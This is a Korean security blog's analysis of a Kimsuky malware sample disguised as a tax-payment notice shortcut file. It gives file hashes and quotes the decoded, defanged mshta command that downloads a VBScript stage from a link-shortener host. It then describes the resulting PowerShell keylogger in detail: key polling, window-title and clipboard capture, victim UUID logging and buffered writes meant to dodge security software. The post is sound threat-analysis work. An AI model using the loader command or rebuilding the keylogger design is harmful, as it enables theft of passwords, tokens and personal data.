오늘은 개인 사업자를 노린 김수키(Kimsuky)에서 만든 악성코드-8월 신고 납부기한 통지서.PDF.lnk 에 대해서 알아보겠습니다.
파일명:암호.txt.lnk
사이즈:1 MB
MD5:ab7c07d41578a1cd0d0ff15c0841bf93
SHA-1:8356f319f00caccd9a6200ef380d809b12d7dc18
SHA-256:f765f6c7983ae0c6ecd319b3179e5cee033463ff804d3eddfb3c932aba6bc302
해당 악성코드는 오늘도 실망시키지 않는 곳인 link24 를 통해서 악성코드 유포가 되고 있습니다. 내가 경찰이면 그냥 해당 사이트 진짜 수사를 진행하거나 대한민국 정부가 그렇게 좋아하는 사이트 차단을 통해서 악성코드가 유포되는 것을 막아야 할 것인데…. 안 하니 개인적으로 해당 사이트 풀어놓으며 좋지만…. 아무튼, 다시 악성코드를 분석해 보겠습니다.

악성코드 분석
1.Base64 인코딩
앞서 link24 부분 언급을 했으니 일단 먼저 악성코드는 Base64 인코딩을 풀며 다음 결과를 확인할 수가 있습니다.
mshta hxxps://link24(.)kr/1cBgfJN
그러면 pwko.zip를 다운로드 합니다.
언제나 똑같은 패턴이라…….
pwko.zip은 압축 파일처럼 생겼지만 실제로는 VBScript 입니다.

mshta.exe이라는 명령을 악용해서 다음 사이트로 접속하면 이제 핵심 악성코드인 pdfko.zip이라는 것을 확보
아무튼, pwko.zip이라는 부분을 난독화 해제하면 다음같이 키로거를 확보를 할 수가 있음

2.PowerShell 를 악용한 키로그(keylogger)
시스템의 SMBIOS,하드웨어 UUID를 가져와 로그 디렉터리 이름으로 사용한다는 것이 특징
k.log 에 저장
3.Windows API 사용
PowerShell의 Add-Type을 사용하여 user32.dll API를 직접 호출
-32767 부분은 16진수 에서 보면 0x8001로 볼 수 있으며 새로운 입력 이벤트를 탐지하려는 패턴으로 보임 그리고 나서 모든 virtual-key 값을 차례로 돌아다님
약 247개의 Virtual-Key 상태를 100Hz 주기로 반복 조회
폴링 방식 (GetAsyncKeyState) 사용을 하고 CPU를 계속 사용하고 백신 프로그램에서는 수상하게 볼 수가 있는 방식

기존 방식에서 변화된 부분
4.실제 수집 데이터
키 입력
특수키 토큰으로 저장됩
{BSPACE}
{TAB}
{ENTER}
{CTRL}
{ALT}
{ESC}
{LEFT}
{UP}
{RIGHT}
{DOWN}
{WinKey}
{CAPS}
{DEL}
{F1}
{F12}
password123 입력 시->password123{ENTER} 으로 저장
Shift만 별도로 지속적으로 감시
Shift가 눌릴 때 아닐 때
{SHIFT},{SHIFT_U} 방식으로 기록 일부 modifier 상태까지 보려는 의도
활성 창 제목
키 입력이 발생할 때마다 현재 foreground window의 제목을 가져오게 설정 어느 프로그램, 사이트에서 입력했는지 컨텍스트를 제공
웹 브라우저,RDP,PuTTY,Outlook,Teams, 암호 관리자 등의 창 제목이 함께 기록
클립보드 수집
클립보드 내용이 이전 값과 다르면:
abcd 이면<<abcd..>>> 형태로 로그에 포함
노출 정보
복사한 비밀번호
API key,access token
암호화폐 주소
이메일 내용
소스코드
SSH 키 일부
주민등록 번호, 신용 카드번호, CVC 번호
로그인 URL
OTP 인증 코드
비밀번호 관리자를 사용하는 사용자도 복사하여 붙여 넣기를 한다면 수집이 됨
수집된 데이터는 즉시 파일에 쓰지 않고 $strbuf 변수(메모리)에 연속 저장
30초마다 한 번씩만 파일(k.log)에 일괄 기록(Out-File -Append)함으로써 빈번한 디스크 쓰기로 인한 보안 프로그램 회피 시도
그리고 실제 Shift,Ctrl,Alt,CapsLock 상태를 ToUnicode() 에 제대로 전달하지 않았으며
대문자, 소문자, Shift 조합, 일부 기호, Altar,비 영문 키보드 배열 등을 제대로 재현하지 못할 가능성 매우 큼

WMI 사용해서 UUID 를 가져온 피해자 식별 목적
피해자 식별
결론
입력 수집:GetAsyncKeyState()로 키보드 상태 폴링
문자 변환:MapVirtualKey() +ToUnicode()
창 정보:GetForegroundWindow() +GetWindowText()
클립보드:Get-Clipboard -Raw
식별자:Win32_ComputerSystemProduct.UUID
저장 위치:%TEMP%\{UUID}\k.log
기록 주기: 약 30초마다
실행 방식: 무한 루프, 10ms 간격
[소프트웨어 팁/보안 및 분석] - 김수키(Kimsuky) 세종 특별시 국세 고지서 로 위장 한 악성코드-국세고지서.zip
김수키(Kimsuky) 세종 특별시 국세 고지서 로 위장 한 악성코드-국세고지서.zip
오늘은 북한 수키(Kimsuky) 에서 만든 악성코드인 종 특별시 국세 고지서로 위장 한 악성코드-국세고지서.zip 에 대해 글을 적어 보겠습니다. 해당 악성코드는 세종 특별시 한누리대로 xxx로 돼 있습
wezard4u.tistory.com
이며 PDF 파일 비밀번호:kfgxl;Y859$#KG4fkdl^& 이며 내용은 세종 특별시 국세 고지서로 위장 한 악성코드인 국세고지서·zip하고 똑같은 내용을 보여주고 있음
즉 PDF 파일은 재탕이며 달려진 점은 PowerShell을 사용을 해서 키로그 작업을 하는 것이 특징
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| 예비군 을 노린것으로 추정 되는 북한 김수키(Kimsuky) 악성코드-향토예비군 훈련 참가 안내 (0) | 2026.08.22 |
|---|---|
| 영국,독일 포켓몬 센터 데이터 유출로 고객 정보 유출 일부 주문 취소 (0) | 2026.08.21 |
| 가짜 USB 장치를 사용하여 Windows 시스템 권한에 접근 문제 발견 (0) | 2026.08.19 |
| Kimsuky(김수키)에서 국내 농화학 업계 대상 공격 악성코드-작물보호제 공급 검토 품목 제안서 (0) | 2026.08.17 |
| 일본인 을 대상으로 이메일 통한 정보 탈취 악성코드(AgentTesla)-20260804-000581.js (0) | 2026.08.15 |
| 윈도우 10 KB5120249,윈도우 11 KB5121003 보안업데이트 (0) | 2026.08.14 |
| 탈북민 수의축산 출신 조xx 박사를 노린 Kimsuky(김수키)에서 만든 악성코드-Review.chm (0) | 2026.08.13 |
| VPN 무력화한 GDID 텔레메트리와 안티포렌식 대응 방법 (0) | 2026.08.12 |





